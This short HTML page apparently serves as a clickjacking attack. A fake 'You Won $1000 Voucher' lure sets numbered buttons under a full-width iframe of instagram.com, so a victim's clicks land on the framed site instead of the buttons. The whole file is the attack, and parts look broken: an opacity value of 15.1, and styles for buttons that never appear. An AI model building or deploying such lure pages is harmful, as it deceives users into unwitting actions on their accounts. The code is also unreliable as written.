<!DOCTYPE html>
<html>
<head>
	<title>Copy Voucher Code to Clipboard</title>
	<style>
		iframe {
			position:relative;
			width: 100%;
			height: 650px;
			opacity: 15.1;
			z-index: 2;
		}
		.firstClick, .secondClick, .thirdClick, .fourthClick, .fifthClick, .sixthClick, h1 {
			position:absolute;
			top:330px;
			z-index: 1;
		}
		.firstClick {
			left: 1280px;
			top: 22px;
		}
		.secondClick {
			left: 1447px;
			top: 579px;
		}
		.thirdClick {
			left: 1380px;
			top: 568px;
		}
		.fourthClick {
			left: 926px;
			top: 292px;
		}
		.fifthClick {
			left: 559px;
			top: 532px;
                }
		.sixthClick {
			left: 559px;
			top: 637px;
		}
		h1 {
			left: 132px;
			top: 143px;
		}
	</style>
</head>
<body>
	<h1>Congrats You Won $1000 Voucher Follow the step & claim voucher</h1>
	<button class="firstClick">click here 1</button>
	<button class="secondClick">Visit here & then press on claim button </button>
	<button class="thirdClick">Claim</button>
	
	<iframe src="https://instagram.com" width="100%" height="100%"></iframe>







